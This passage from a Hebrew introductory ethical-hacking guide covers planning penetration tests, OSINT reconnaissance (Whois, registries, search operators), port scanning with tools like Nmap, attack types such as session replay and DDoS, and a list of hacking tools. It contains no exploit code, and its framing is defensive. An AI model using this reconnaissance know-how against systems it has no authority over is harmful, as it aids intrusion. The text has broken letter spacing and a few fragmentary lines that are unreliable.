‫אמנםי שנם כ לים חינמיים ר בים באינ טרנ ט שיאפ שרו לך ל בצע בדי קות ופריצות‪ ,‬א ב ל כמות הזמן‪ ,‬ה כ סף והמאמץ שאתה‬
‫י כו ל לה ש קיע בפריצות ש לךי ק בעו באי לו סוגי כ לים תו כ ל לה שתמ ש כדי להגן ע ל המער כות ש לך ו ל ח קור נ קודות תורפה‬
‫אפ שריות‪ . .‬עם זה ב ח ש בון‪ ,‬אתה מ ק ב ל את הרעיון שאם אתה מעריך זמן ומאמץ‪ ,‬אתה צריך את הת קצי ב הנ כון כדי לר כו ש‬
‫כ לי הא קרים אתיים מה שורה הרא שונה‪.‬‬
‫‪ 3.‬מה אתה רוצה להוציא מ בדי קות הפריצה ש לך?‬
‫אם אתה נ ש כר כהא קר אתי ע לידי ארגון‪ ,‬אתה צריך ל ק בוע איזה סוג ש ל הצד קה אתה צריך להציג את ההנה לה כדי לה שיג‬
‫את התוצאות ה טו בות ביותר האפ שריות מתוך המ ח קר ש לך‪.‬‬
‫פר ק ‪ 3:‬מיפוי הפריצות ש לך‬
‫כא שר אתה מ חפ ש נ קודות תורפה‪ ,‬אינך צריך ל בדו ק כ ל פרו טו קו ל א ב ט חה שהת קנת ע ל כ ל המ כ שירים ש לך בו זמנית ‪-‬‬
‫פעו לה זו לא ר ק תהיה מאוד מ ב ל ב לת‪ ,‬א לא גם ע לו לה לגרום ל כמה בעיות מ כיוון שיהיו לךיותר מדי הר בה ע ל הצ ל חת ש לך‪.‬‬
‫במידת האפ שר‪ ,‬הפוך את ה בדי קות ש לך לניתנות לניהו ל ע לידי פירו ק פרוי ק ט ה בדי קה ל ש ל בים מע שייםיותר‪.‬‬
‫כדי לה ק ל ע ליך לה ח לי ט איזו מער כות צריך ל ל כת קודם‪ ,‬שא ל את עצמך את ה שא לות ה באות‪:‬‬
‫‪1.‬אי לו מער כות‪ ,‬בעת ת קיפה‪,‬יגרמו לצרות הר בות ביותר אויצרו את ההפ סדים ה בעייתיים ביותר?‬
‫‪2.‬אי לו ח ל קים במער כות ש לך נראים ה כי פגיעים להת קפת הא קרים?‬
‫‪3.‬אי לו ח ל קים במער כות ש לך ה כי פ חות מתועדים‪ ,‬נ בד קים לעתים ר חו קות‪ ,‬או שאתה ב קו שייודע מ שהו ע ליהם?‬
‫לא חר שת סיים ליצור את היעדים ש לך וזיהית את ה ח ל קים הפגיעים ביותר ש ל המער כות ש לך‪ ,‬כעת תו כ ל לה ח לי ט אי לו מהם‬
‫ע ליך ל בדו ק קודם‪ .‬ע לידי ה כרת התוצאות ש ברצונך לה שיג וערי כת תו כנית ניתנת ל ביצוע‪ ,‬תו כ ל להגדיר את הציפיות ש לך‬
‫כראוי ו ל ק ב ל הער כה טו בה לג בי כמה זמן ע ליך ל בצע בדי קות ו כמה מ שא בים ע ליך לה ש קיע ב כ ל בדי קה שת בצע‪.‬‬
‫ארגון הפרוי ק ט ש לך‬
‫א לה צרי כים להיות המער כות‪ ,‬היי שומים והמ כ שירים שע לי כם ל בצע ע ליהם את ה בדי קות‪:‬‬
‫‪ 1.‬שרתי דואר א ל ק טרוני‪ ,‬הדפ סה ו ק בצים‬
‫‪ 2.‬חומות א ש‬
‫‪ 3.‬שרתי מ סד נתונים‪ ,‬אינ טרנ ט ויי שומים‬
‫‪ 4.‬מער כות הפע לה ש ל ל קו ח‪ /‬שרת‬
‫‪ 5.‬טא ב ל טים‪ ,‬מ ח ש בים ניידים ות חנות ע בודה‬
‫‪ 6.‬מתגים ונת בים‬
‫כעת‪ ,‬כמות ה בדי קות שתו כ ל ל בצע תהיה ת לויה ב כמה מ כ שירים ומער כות אתה צריך ל בצע את ה בדי קות ש לך‪ .‬אםי ש לך‬
‫ר שת ק טנה‪ ,‬אז אתהי כו ל ל בדו ק כ ל פריפריה‪ .‬עם זאת‪ ,‬כ ל תה ליך הפריצהי כו ל להיות גמי ש וצריך להיות ת לוי במה שה כי‬
‫הגיוני ע בורך‪.‬‬
‫אם אתה מת ק שה באיזו פריפריה או מער כת ע ליך להת חי ל ל בדו ק ת חי לה‪ ,‬ש קו ל את הגורמים ה באים‪:‬‬
‫‪ 1.‬סוג מער כת ההפע לה או היי שומים פוע לים ע ל המער כת ש לך‬
‫‪ 2.‬סיווג ו כמות המידע ה קרי טי המאו ח סן במער כת המ ח ש ב ש לך‬
‫‪ 3.‬מער כות ואפ לי קציות הנמצאות בר שת‪.‬‬

‫מתי כדאי להת חי ל לפרוץ?‬
‫כ ל פריצה מוצ ל חת בהת ב ס ס ע ל התזמון ש ב חרת להפעי ל מת קפת בדי קה‪ .‬כא שר אתה ממפה את לו ח הזמנים ש ל ה בדי קות‬
‫ש לך‪ ,‬וודא שאתה מ בצע את ה בדי קות ש לך בזמנים שיגרמו לפ חות הפרעה למ שתמ שים א חרים‪ .‬אינך רוצה לגרום ל בעיות‬
‫בעת בדי קת מת קפת מניעת שירות )‪ (DoS‬בת קופה ע ס קית קרי טית ש בה מ כירות בדרך כ ל ל מגיעות לארגון ש בו אתה עו בד‪.‬‬
‫אתה גם לא רוצה להית ק ל ב בעיות מער כת ו לא להיות מ סוג ל לפתור את זה בדיו ק בזמן לפני שאתה צריך לה שתמ ש במ ח ש ב‬
‫ש לך‪.‬‬
‫בעת תזמון בדי קות‪ ,‬ודא ש כ ל המעור בים מעור בים בתו כנית ש לך‪ .‬זהיעזור לך להגדיר ציפיות וגםייתן לך ציר זמן לג בי מתי‬
‫אתה צריך ל סיים את ה בדי קה‪.‬‬
‫מה א חרים רואים?‬
‫אתהי כו ל ל ק ב ל פר ספ ק טי בה טו בהיותר ע ל הפגיעות ש ל המער כות שאתה צריך ל בדו ק ע לידי ה סת כ לות ת חי לה ע ל מה‬
‫שהא קרים פ לי ליים פו טנציא ליים ע שויים לראות מ ב חוץ‪ .‬כדי לע שות זאת‪ ,‬אתה צריך לראות איזה סוג ש ל שו ב לים המער כת‬
‫ש לך מ שאירה שם ב כ ל פעם שמי שהו מ שתמ ש בר שת ש לך‪.‬‬
‫אתהי כו ל לע שות את הפעו לות ה באות כדי לא סוף את הע ק בות הא לה‬
‫‪1.‬הפע ל חיפו ש מ קוון ע ל הארגון ש בו אתה עו בד‪ .‬אם אתה מ בצע בדי קות למער כת האי שית ש לך‪ ,‬חפ ש פרי טים ה ק שורים‬
‫א ליך‪.‬‬
‫‪ 2.‬בצע בדי קה ע ליציאות פתו חות אפ שריות או הפע ל סרי קת ר שת מ לאה כדי ל ק בוע דו חות מער כת ספציפיים שאנ שים‬
‫מ ב חוץ ע שויים לראות לג בי המ כ שירים ש לך‪ .‬מ כיוון שאתה ה בע לים ש ל המער כת שאתה עומד ל בדו ק‪ ,‬אתהי כו ל לה שתמ ש‬
‫ב סור קייציאות מ קומיים ו ב כ לי איתור שיתוף הזמינים ‪ -Windows,‬ב כגון ‪LANguard‬או ‪GFI.‬‬
‫לא חר מ כן‪ ,‬תו כ ל ל בצע חיפו שים ספציפייםיותר באינ טרנ ט‪ .‬נ סה למצוא את הד ברים ה באים‪:‬‬
‫‪ 1.‬פ טנ טים או סימנים מ ס חריים‬
‫‪ 2.‬מ סמ כי ‪SEC‬‬
‫‪ 3.‬ר כי שות ומיזוגים קודמים‬
‫‪4.‬הודעות לעיתונות ע ל הר כ ש וה שינויים ה חיוניים ביותר בארגון ש לך‬
‫‪ 5.‬פר טי הת ק שרות המפנים כ לפי ח ברי הארגון או העו בדים‪ .‬אתהי כו ל ל בצע בדי קות ר קע באופן מיידי באתרים ה באים‪:‬‬
‫‪1. USSeach‬‬
‫‪2. ChoicePoint‬‬
‫‪3. ZabaSearch‬‬
‫‪6.‬הג שות התאגדות‪ .‬אתהי כו ל ל חפ ש אותם באמצעות אתרים ע ס קיים כגון‬

‫‪)www.sec.gov/edgar.shtml‬מציג הג שות ש ל ח ברות צי בוריות(‬
‫הנה טיפ‪ :‬אם אינך מוצא את המידע שאתה מ חפ ש או אם אתה רוצה להעמי ק באתר באמצעות חיפו ש מי לות מפת ח פ שו ט‪,‬‬
‫בצע חיפו ש מת קדם באינ טרנ ט‪ .‬לדוגמה‪ ,‬אם אתה רוצה למצוא ק בצים באתר מ סוים‪ ,‬אתהי כו ל לה שתמ ש במ חרוזות א לה‬
‫אתר‪)www.(domain).com :‬מי לת מפת ח או שם קו בץ( ‪ -‬ל חיפו ש ק בצים ספציפיים באתר מ סוים‬
‫‪ filetype :swf (company)_(name) -‬כדי ל חפ ש ק בצי פ לא ש שאו לי ניתן לפר ק כדי ל ק ב ל גי שה למידע מוצפן‬
‫כעת‪ ,‬לא חר שי ש לך מו שג לג בי מה שא חרים רואים לג בי מה שאתה מנ סה להגן באינ טרנ ט‪ ,‬הגיע הזמן שתת חי ל למפות את‬
‫הר שת ו ל חפ ש את הפגיעויות הפו טנציא ליות ש ל המער כת ש לך‪.‬‬
‫מיפוי הר שת‬
‫כא שר אתה רוצה לה כין תו כנית מוצ קה כיצד אתה מת כוון לפרו ס את תו כנית הפריצה האתית ש לך‪ ,‬א חד הד ברים הרא שונים‬
‫שאתה צריך לדעת הוא כמה אנ שים א חריםיודעים ע ל הר שת ש לך‪ .‬למרות שאתה ע שוי ל ח שו ב שי ש לך אנונימיות מ לאה‬
‫באינ טרנ ט‪ ,‬המ ח ש ב ש לך מ שאיר ל לא הרף ע ק בות המצ ביעות כ לפיך וא ל המער כת ש בה אתה מ שתמ ש‪.‬‬
‫כדי ל ק ב ל מו שג טו ביותר לג בי כמות המידע ע ליך או ע ל הדומיין ש לך זמין לצי בור‪ ,‬מומ לץ לעיין בפר טים ה באים‪:‬‬
‫מי זה‬
‫‪Whois‬הוא כ לי מ קוון ש בו אתהי כו ל לה שתמ ש כדי לראות אם שם דומיין זמין‪ .‬עם זאת‪ ,‬ניתן לה שתמ ש בו גם כדי לראות‬
‫מידע רי שום ע ל דומיינים קיימים‪ .‬זה אומר שי ש סי כוי גדו ל ש כתו בות האימיי ל ופר טי ה ק שר ש לך מ שודרים באינ טרנ ט‪.‬‬
‫‪ Whois‬מ ספ קת גם מידע ע ל שרתי ‪ DNS‬שנמצאים ב שימו ש ע לידי הדומיין ש לך ופר טים ע ל התמי כה ה ט כנית ש ל ספ ק‬
‫ה שירות ש לך‪.‬י ש לו גם כ לי שנ קרא ‪ DNSstuff,‬שמ בצע את הפעו לות ה באות‪:‬‬
‫הצג אי לו מאר חים מ טפ לים בדוא" ל זה ע בור דומיין מ סוים‬
‫הצגת מי קומים ש ל מאר חים‬
‫ראה אם מאר ח מ סוים מופיע בר שימה ה ש חורה כמאר ח טוו ח‬
‫הצג מידע כ ל לי ע ל רי שום דומיין‪.‬‬
‫מ ל בד ‪-Whois,‬האתהי כו ל ל ק ב ל מידע דומה ע ל דומיינים שונים באמצעות האפ שרויות ה באות‪:‬‬
‫‪ 1. www.dot.gov -‬מ ספ ק מידע ע ל הממ ש לה‬
‫– ‪ 2. www.nic.mil‬מ ספ ק מידע ע ל הצ בא‬
‫‪ 3. www.afrinic.net -‬מ ספ ק מידע ממר שם אינ טרנ ט באפרי קה‪.‬‬
‫‪ 4. www.apnic.net -‬מ ספ ק מידע ע ל רי שום האינ טרנ ט האזורי ש ל א סיה פ סיפי ק‪.‬‬
‫‪ 5. ws.arin.net/whois/index.html -‬מ ספ ק מידע ע ל רי שום האינ טרנ ט ב ח ל קים מ סוימים ש ל אפרי קה המ שוונית‪ ,‬צפון‬
‫אמרי קה‪ ,‬ו כמה אזורים באיים ה קרי ביים‪.‬‬
‫‪ 6. www.lacnic.net/en -‬מ ספ ק מידע ע ל רי שום אינ טרנ ט ב קארי ביים ו באמרי קה ה ל טינית‬
‫‪ 7. www.db.ripe.net/whois -‬מ ספ ק מידע ע ל רי שום אינ טרנ ט באזורי אפרי קה‪ ,‬אירופה‪ ,‬המזר ח התי כון ומר כז א סיה‪.‬‬
‫פורומים ו ק בוצות גוג ל‬
‫פורומים ו ק בוצות ‪ Google‬מ ספ קים שפע ש ל מידע ע ל מידע ר שת צי בורית‪ ,‬כגון כתו בות ‪ IP,‬שמות מ שתמ ש ור שימות ש ל‬
‫שמות דומיין מ לאים ‪(FQDNS).‬אתהי כו ל ל חפ ש טונות ש ל פו ס טים ש ל ‪ Usenet‬ו למצוא מידע פר טי שאו לי לא ה בנת‬
‫שפור סם בפומ בי‪ ,‬שע שוי ל כ לו ל מידע סודי ביותר שע שוי ל ח שוףיותר מדי ע ל פעי לויות המער כת ש לך‪.‬‬
‫הנה טיפ‪ :‬אם אתה מודע ל כך שי ש לך מידע סודי המפור סם באינ טרנ ט‪,‬יית כן שתו כ ל להוציא אותו מהאינ טרנ ט כ ל עודי ש‬
‫לך את האי שורים הנ כונים‪ .‬כ ל מה שאתה צריך לע שות הוא לפנות לאנ שי התמי כה ש ל הפורום ש ל ק בוצת גוג ל או הפורום‬
‫שפר סמו את המידע הפר טי ו להגי ש דיוו ח‪.‬‬
‫מדיניות פר טיות‬
‫מדיניות הפר טיות ש ל אתר אינ טרנ ט היא דרך לאפ שר לאנ שים המ שתמ שים באתר להיות מודעים ל סוגי המידע הנא ספים‬
‫מהם ו כיצד המידע מוגן ב כ ל פעם שהם מ ב קרים באתר‪ .‬עם זאת‪ ,‬מדיניות פר טיות לא צרי כה ל ח שוף מידע א חר שע שוי‬
‫ל ספ ק להא קרים רעיונות כיצד הםי כו לים ל חדור למער כת‪.‬‬
‫אם אתה מת חי ל ל בנות את האתר ש לך או מנ סה ל ש כור מי שהו שי כתו ב את מדיניות הפר טיות ש לך‪ ,‬דאג ש לא ת שדר את‬
‫הת שתית ש ל א ב ט חת הר שת ש לך‪ .‬כ ל מידע ע ל חומת הא ש ש לך ופרו טו קו לי א ב ט חה א חריםייתן רמזים להא קרים פ לי ליים‬
‫כיצד הםי כו לים לפרוץ למער כת ש לך‪.‬‬
‫ביצוע סרי קות מער כת‬
‫ברגע שאתהיודע איך אתהי כו ל לא סוף מידע ע ל הר שת ש לך באופן פעי ל‪,‬יהיה לך מו שג כיצד הא קרים פ לי ליים ע לו לים‬
‫לפתו ח במת קפה נגד הר שת ש לך‪ .‬הנה כמה מהד ברים שאתהי כו ל לע שות כדי לראות עד כמה המער כת ש לך פגיעה‪:‬‬
‫‪1.‬ה שתמ ש בנתונים שמצאת ב חיפו שי ‪ Whois‬ש לך כדי לראות כיצד ניתן לפרו ס שמות מאר חים ו כתו בות ‪ IP‬ק שורות‪.‬‬
‫לדוגמה‪ ,‬אתהי כו ל לאמת מידע ע ל האופן ש בו כמה שמות מאר חים פנימיים‪ ,‬פרו טו קו לי הפע לה‪ ,‬שירותים פוע לים‪,‬יציאות‬
‫פתו חות ויי שומים מוצגים ב חיפו ש באינ טרנ ט‪ ,‬מה שע שוי לתת לך מו שג כיצד הא קרים פ לי ליים ע לו לים ל חדור ב קרו ב למער כת‬
‫ש לך‪.‬‬
‫‪ 2.‬סרו ק את המאר חים הפנימיים ש לך ודע לאי לו מ שתמ שים או לי סוררים ע שויים לג שת‪ .‬ז כור כי תו קף ע שוי להגיע מתוך‬
‫הארגון ש לך ו לה קים חנות בא חד המאר חים ש לך‪ ,‬ד בר שע לו ל להיות ק שה מאוד להצ ביע ע ליו‪.‬‬
‫‪ 3.‬בדו ק את תו כנית ה שירות ‪ Ping‬ש ל המער כת ש לך‪ ,‬או ה שתמ ש ב כ לי שירות ש ל צד ש לי שי המאפ שר לך ל בצע ‪ ping‬ש ל‬
‫כתו בות שונות בו‪-‬זמנית‪ .‬אתהי כו ל לע שות זאת ע לידי שימו ש ב כ לים כגון ‪)NetScan Tools, fping‬אם אתה מ שתמ ש‬
‫)‪ -Unix‬באו ‪SuperScan.‬אם אינך מודע מהי כתו בת ה‪ PI-‬ש ל ה שער ש לך‪ ,‬תו כ ל ל חפ ש את כתו בת ה‪ PI-‬הצי בורית ש לך ע ל‬
‫ידי מע בר ל כתו בת ‪www.whatismyip.com.‬‬
‫‪ 4.‬בצע סרי קה מ ב חוץ פנימה ש ל המער כת ש לך ע לידי סרי קה לאיתוריציאות פתו חות‪ .‬כדי לע שות זאת‪ ,‬אתהי כו ל לה שתמ ש‬
‫ב כ לים כגון ‪Nmap‬או ‪ Superscan,‬ו לא חר מ כן ל בדו ק מה א חריםי כו לים לראות בתע בורת הר שת ש לך באמצעות כ לים כגון‬
‫‪Wireshark‬או ‪Omnipeek.‬‬
‫ע לידי ביצוע סרי קה זו‪ ,‬אתהי כו ל ל ק ב ל מו שג ע ל מה שאנ שים א חריםי כו לים לראות כ שהם סור קים את כתו בת ה‪PI-‬‬
‫הצי בורית ש לך ואז מ ח ברים ת חנת ע בודהי שירות לר כזת או מע בירים את הצד הצי בורי ש ל הנת ב ש לך‪.‬‬
‫ברגע שתצ לי ח ל סרו קיציאות פתו חות‪ ,‬תו כ ל לה בין שאנ שים מ ב חוץ שמ בצעים סרי קה ע ל היציאות הפתו חות ש לךי כו לים‬
‫למצוא ב ק לות את המידע ה בא‪:‬‬
‫שירותי ‪ VPN‬שאתה מפעי ל‪ ,‬כגון ‪-SSL‬ו ‪IPSec, PPTP‬‬
‫שירותים הפוע לים ביציאות ש לך‪ ,‬כגון דואר א ל ק טרוני‪ ,‬אפ לי קציות מ סד נתונים ו שרתי אינ טרנ ט‬
‫דרי שת אימות ל שיתוף בין ר שתות‬
‫שירותי גי שה מר חו ק הזמינים במער כת ש לך‪ ,‬כגון שו ל חן ע בודה מרו ח ק‪-Windows Terminal Services. ,‬ו ‪VNC‬‬
‫‪Secure Shell,‬‬
‫מ ב ט ע ל פגיעויות מער כת‬
‫ברגע שתצ לי חו לראות כיצד אנ שיםי כו לים ל חדור למער כת הא ב ט חה ש ל המ ח ש ב ש ל כם‪ ,‬תו כ לו לה בין למה תו קף ע שוי לרצות ל כוון במ ח ש ב ש ל כם‪.‬‬
‫אם אינך מודע לפגיעויות ה שונות ברו ב מער כות המ ח ש ב‪ ,‬תו כ ל למצוא מידע זה ע ל מ סדי נתונים ש ל פגיעות כגון‬
‫‪ 1.‬מ סד נתונים ש ל הערות פגיעות ש ל )‪US-CERT (kb.cert.org‬‬
‫‪ 2.‬פגיעויות ו ח שיפה נפוצות )‪(cve.mitre.org/cve‬‬
‫‪ 3.‬מ סד הנתונים ה לאומי לפגיעות ש ל )‪NIST (nvd.nist.gov‬‬
‫אתרים א לו מתעדים את כ ל פגיעויות המער כת הידועות‪ ,‬מה שיאפ שר לך ל בצע את ההער כה הנ כונה ע בור המער כת ש לך‪ .‬לא חר ביצוע ההער כה‪,‬‬
‫תו כ ל לה שתמ ש ב כ לים שונים לניהו ל ניהו ל פגיעות‪ .‬בהתאם לנ קודות התורפה שהצ ל חת למצוא‪ ,‬תו כ ל לה שתמ ש במידע שמצאת ע ל המער כת‬
‫ו לזהות איזו הת קפה צפויה להתר ח ש‪ .‬ניתן ל בצע הת קפות א לה כדי ל בצע את הפעו לות ה באות‪:‬‬
‫‪1.‬צ לם את המ סך ש לך בזמן שאתה פות ח ק בצים ח סויים‬
‫‪ 2.‬ק ב ל גי שה ל ק בצים הי קרים או הרגי שים ביותר‬
‫‪ 3.‬ש ל ח ק בצים או מיי לים כמנה ל‬
‫‪ 4.‬עצור או הפע ליי שומים או שירותים‬
‫‪ 5.‬ק ב ל שורת פ קודה מר חו ק‬
‫‪6.‬ה שג מידע עמו קיותר ע ל מאר חים ונתונים‬
‫‪7.‬גי שה למער כות מ חו ברות א חרות‬
‫‪8.‬ה ש בת ב קרות א ב ט חה אויומנים‬
‫‪ 9.‬בצע הת קפות ‪DoS‬‬
‫‪10.‬שה הזר קת ‪SQL‬‬

‫תע‬
‫‪11.‬לה קו בץ שמ שדר הת קפה‪.‬‬

‫הע‬
‫כעת‪ ,‬לא חר שאתם מודעים לאופן ש בו הא קריםי כו לים לזהות נ קודות תורפה במער כת ש ל כם ו ל בצע הת קפות אפ שריות בהתאם למידע שהם מצאו‬
‫ע ל הר שת ש ל כם‪ ,‬הגיע הזמן שתדעו כיצד הם חודרים דרך א ב ט חת המער כת ש ל כם‪.‬‬
‫פר ק ‪ 4:‬ע ל הת קפות‬
‫כא שר אתה מ סת כ ל לתוך מו חו ש ל הא קר‪ ,‬אתה ע שוי לה בין שי ש שני סוגים ש ל הא קרים שאתה צפוי להית ק ל בהם ‪-‬‬
‫הפ סי בי והא ק טי בי‪ .‬ה כרת סוגי ההת קפות שהם עו שים תאפ שר לך לה כין את עצמך להגן ע ל המער כת שאתה מנ סה להגן‬
‫ע לידי הת קנת פרו טו קו ל הא ב ט חה הנ כון‪.‬‬
‫מהי הת קפה פ סי בית?‬
‫הת קפה פ סי בית היא הת קפה ש בה ההא קר מ ח כה להזדמנות המו ש למת ל חדור למער כת ש לך‪ .‬סוג זה ש ל הת קפה נע שה בדרך כ ל ל ע ל מנת שההא קר‬
‫יו כ ל ל ב חון את מ בנה הר שת ש לך‪ ,‬סוג התו כנה ש בה אתה מ שתמ ש‪ ,‬או כ ל אמצעי א ב ט חה ש כ בר הת קנת‪.‬‬
‫הת קפות פ סי ביות מתר ח שות בדרך כ ל ל כא שר הא קר עו ק ב א חר נ קודות תורפה אפ שריות ש ל המער כת מ ב לי ל בצע שינויים כ ל שהם בנתונים שא ליהם‬
‫הוא מ כוון‪ .‬אתהי כו ל ל ח שו ב ע ל המת קפה הזו כאמצעי ש ל הא קר ל ח קור ע ל היעד ש לו ע ל מנת לצאת להת קפהיעי להיותר‪.‬‬
‫הת קפות פ סי ביות מ סווגות ל‪:‬‬
‫‪ 1.‬סיור א ק טי בי‬
‫זה קורה כא שר פו ל ש מ ק שי בי שירות למער כת ממו קדת ע לידי הפע לת המ טרה כדי לג לות הי כן נמצאות נ קודות התורפה‪ .‬זה נע שה בדרך כ ל ל‬
‫באמצעות סרי קתיציאות‪ ,‬שהיא ט ק טי קהיעי לה כדי לג לות הי כן ממו קמות היציאות הפגיעות ואיזה סוג נתונים הן מאר חות בדרך כ ל ל‪ .‬לא חר‬
‫גי לוי הפגיעות‪ ,‬הא קר ע לו ל לע סו ק בנ קודת תורפה זו ו לנצ ל את ה שירותים המ שוי כים א ליהם‪.‬‬
‫‪ 2.‬סיור פ סי בי‬
‫זה קורה כא שר הא קר בו חר ל ח קור את המער כת הממו קדת מ ב לי להפעי ל אותה באופן פעי ל‪ ,‬ל לא כוונה לע סו קי שירות במ טרה‪ .‬ט ק טי קות‬
‫סיור פ סי ביות כו ל לות נהיגה במ ל חמה )גי לוי ש ל ר שת א ל חו טית לא מוגנת(‪ ,‬צ לי לה לא שפה )מציאת נתונים ע ל מ כ שירים או מ סמ כים שהו ש ל כו(‪,‬‬
‫או הת חפו שות )הת חזות למ שתמ ש בר שת עם הר שאה(‬
‫שתי ה ט ק טי קות ה ל לוי כו לות להיות כ לים חיוניים ב כ ל הנוגע לגי לוי נ קודות תורפה במער כת המ ח ש ב ש לך כדי לאפ שר לך למנוע הת קפות‬
‫נו ספות‪ .‬ברגע שאתה מ סוג ל לה שתמ ש ב ט ק טי קות סיור‪ ,‬אתהי כו ל ב ק לות למפות הי כן באמת נמצאות נ קודות התורפה ש ל מער כת המ ח ש ב‬
‫ש לך‪.‬‬
‫לא חר שתצ לי חו לזהות נ קודות פגיעות באמצעות שימו ש בהת קפות סיור מ ב חן‪ ,‬ת בינו שהדרך הפ שו טה וה טו בה ביותר להגן ע ל מער כת‬
‫המ ח ש ב ש ל כם מפני ח ט טנות היא הת קנת ‪)IPS‬מער כת למניעת חדירה(‪ ,‬שת שמ ש ל כם כהגנה מפני ח ט טנות‪ .‬סרי קותיציאות וה שי טה‬
‫האו טומ טית ש לך ל כי בוי כ ל ני סיונות ש ל סרי קתיציאות לפני שפורץ מ ק ב ל מפה מ לאה ש ל הר שת ש לך‪ .‬במ ק בי ל‪ ,‬תו כ לו גם להת קין חומת א ש‬
‫טו בה שת ש לו ט ע ל הנראות ש ליציאות הר שת ש ל כם‪.‬‬
‫מהי הת קפה א ק טי בית?‬
‫הת קפה א ק טי בית היא ניצו לי שיר בר שת ממו קדת‪ ,‬ש בה הא קר שואף ליצור שינויים בנתונים או ליצור נתונים שיצרפו את‬
‫עצמם למ טרה כדי ל בצע ניצו לים נו ספים‪.‬‬
‫הת קפות פעי לות מ סווגות בדרך כ ל ל לגורמים ה באים‪:‬‬
‫‪ 1.‬מת קפת מ ס כות‬
‫בהת קפה זו‪ ,‬הא קר מעמיד פנים שהוא מ שתמ ש לגי טימי בר שת כדי ל ק ב ל גי שה עמו קהיותר או הר שאה טו בה‬
‫יותר‪ .‬הא קר עו שה זאת בדרך כ ל ל ע לידי שימו ש במזהי מ שתמ ש ו סי סמאות פרוצים‪ ,‬ע קיפת מער כת אימות או‬
‫ניצו ל פגמי א ב ט חה שהתג לו‪.‬‬
‫ברגע שהא קר מצ לי ח ל חדור למער כת עם הזהות שהוא מתיימר להיות לו‪ ,‬הםי כו לים ב ק לות ל בצע שינויים או‬
‫למ חו ק כ ל תו כנה או קו בץ‪ ,‬ואפי לו להעיף מ שתמ שים מור שים בר שת‪ .‬הםי כו לים גם ל בצע שינויים בהגדרות הר שת‬
‫והנת ב‪ ,‬מה שע שוי לאפ שר להם ל ק ב ל גי שה ל‪-‬‬
‫‪ 2.‬שידור חוזר ש ל הפגי שה‬
‫בהת קפה זו‪ ,‬הא קר עו שה שימו ש במזהה הפע לה גנו ב ע ל מנת ליצור אימות או טומ טי בפעם ה באה שהמ טרה‬
‫ניג שת לאתר מ סוים‪ .‬הת קפה זו מנצ לת את אופי האינ טרנ ט ש ל א ח סון טפ סים‪ ,‬קו בצי ‪ Cookie‬ו כתו בות ‪URL‬‬
‫בדפדפן‪ .‬ברגע שההא קר מ ק ב ל את הנתונים המ שמ שים את מזהה ההפע לה המ סוים באתר ממו קד‪ ,‬הואי כו ל‬
‫להמ שיך להת קפת הפע לה חוזרת‪ ,‬המאפ שרת לו לע שות כ ל מה שהמ שתמ ש ה לגי טימי ש ל המזההי כו ל לע שות‪.‬‬
‫מ כיוון שהת קפות שידור חוזר ש ל הפע לה אינן מתר ח שות בזמן אמת‪ ,‬הת קפה זו מתג לה בדרך כ ל ל ברגע‬
‫שהמ שתמ ש ה לגי טימי מג לה אי התאמות ב ח ש בונו‪ .‬רו ב הזמן‪ ,‬קור בנות ש ל הת קפת שידור חוזר ר ק מג לים‬
‫שה ח ש בונות ש להם נפגעו ר ק כא שר כ בר התר ח שה גני בת זהות‪.‬‬
‫‪ 3.‬מניעת שירות )‪ (DoS‬ומניעת שירות מ בוזרת )‪(DDoS‬‬
‫מת קפת ‪ DoS‬מוגדרת כמניעת גי שה או שירות למ שתמ ש לגי טימי ‪-‬אתהי כו ל לראות ש כ ל ה שירותים שפוע לים‬
‫במ ח ש ב ש לך מא טים או נ סגרים בפתאומיות בזמן שאתה מ שתמ ש בהם‪ .‬מת קפת ‪ DDoS,‬לעומת זאת‪ ,‬כו ל לת‬
‫מ ספר גדו ליותר ש ל מער כות שנפגעו בע בר ע לידי הא קר כדי לת קוף מ טרה מ סוימת‪.‬‬
‫בעוד שהת קפות ‪-DDoS‬ו ‪DoS‬אינן מ שמ שות לה שמדת מער כת הא ב ט חה ש ל מ טרה או לגני בת נתונים‪ ,‬ניתן‬
‫לה שתמ ש בהן כדי לייצר או בדן רוו ח או להפוך מער כת מ ח ש ב ח סרת תוע לת ל ח לו טין בזמן ה שימו ש בה‪ .‬בדרך‬
‫כ ל ל‪ ,‬הת קפות א לו נע שות כדי ליצור או בדן זמני ב קי שוריות בר שת ו ל ש לו ל את כ ל ה שירותים ה ק שורים‪ .‬במ קרים‬
‫מ סוימים‪ ,‬הת קפות א לוי כו לות גם להרו ס ק בצים מ סוימים‬
‫ותו כניות במ ח ש ב ממו קד‪.‬‬
‫הת קפת ‪DoS‬או ‪DDoS‬דומה מאוד ל חי בור אינ טרנ ט אי טי ומ ח ש ב אי טי בו זמנית‪ .‬במה לך הת קפה כזו‪ ,‬אתה ע לו ל‬
‫להרגי ש ש ביצועי הר שת ש לך אי טיים בצורהיוצאת דופן ואינךי כו ל לג שת לאף אתר‪.‬י חד עם זאת‪ ,‬ק לי ח סית גם‬
‫לג לות אם אתה ממו קד להת קפה ‪-‬אתה ע לו ל לראות שאתה מ ק ב ליותר מדי ספאם או סימנים א חרים ש ל תנועה‬
‫חריגה‪.‬‬
‫כעת‪ ,‬לא חר שי ש לך מו שג לג בי סוגי ההת קפות שהא קר ע לו ל להפעי ל‪ ,‬הגיע הזמן שת למד כיצד הא קרי כו ל להפעי ל אותן‬
‫ו לה כין את עצמך ל בצע צעדי נגד‪.‬‬
‫פר ק ‪ 5:‬כ לי פריצה‬
‫גם להא קרים אתיים וגם לפ שעיםי ש גי שה ל שפע ש ל כ לי פריצה שניתן לה שתמ ש בהם כדי לת קוף או להגן ע ל מער כת מ סוימת‪ .‬כ לים א להי כו לים להיות‬
‫מ קורות המונים מהאינ טרנ ט דרך פורומים ומר כזים מ קוונים א חרים המו קד שים להא קרים‪.‬‬
‫כהא קר אתי מת חי ל‪ ,‬ח שו ב מאוד שת למד את ה כ לים הנפוצים ביותר לאיתור נ קודות תורפה אפ שריות‪ ,‬ביצוע בדי קות וניהו ל פריצות בפוע ל‪ .‬לה לן ‪8‬‬
‫מה כ לים הפופו לריים ביותר בהם מ שתמ שים הא קרים כיום‪:‬‬
‫‪ 1.‬סור ק ‪IP‬זועם )‪(ipscan‬‬
‫המ כונה הפופו לרית ביותר ב שם ‪ ipscan‬ע לידי הא קרים ותי קים‪ ,‬ה כ לי הזה מ שמ ש למע ק ב א חר מ ח ש בים דרך כתו בות ה‪ PI-‬ש להם וגם‬
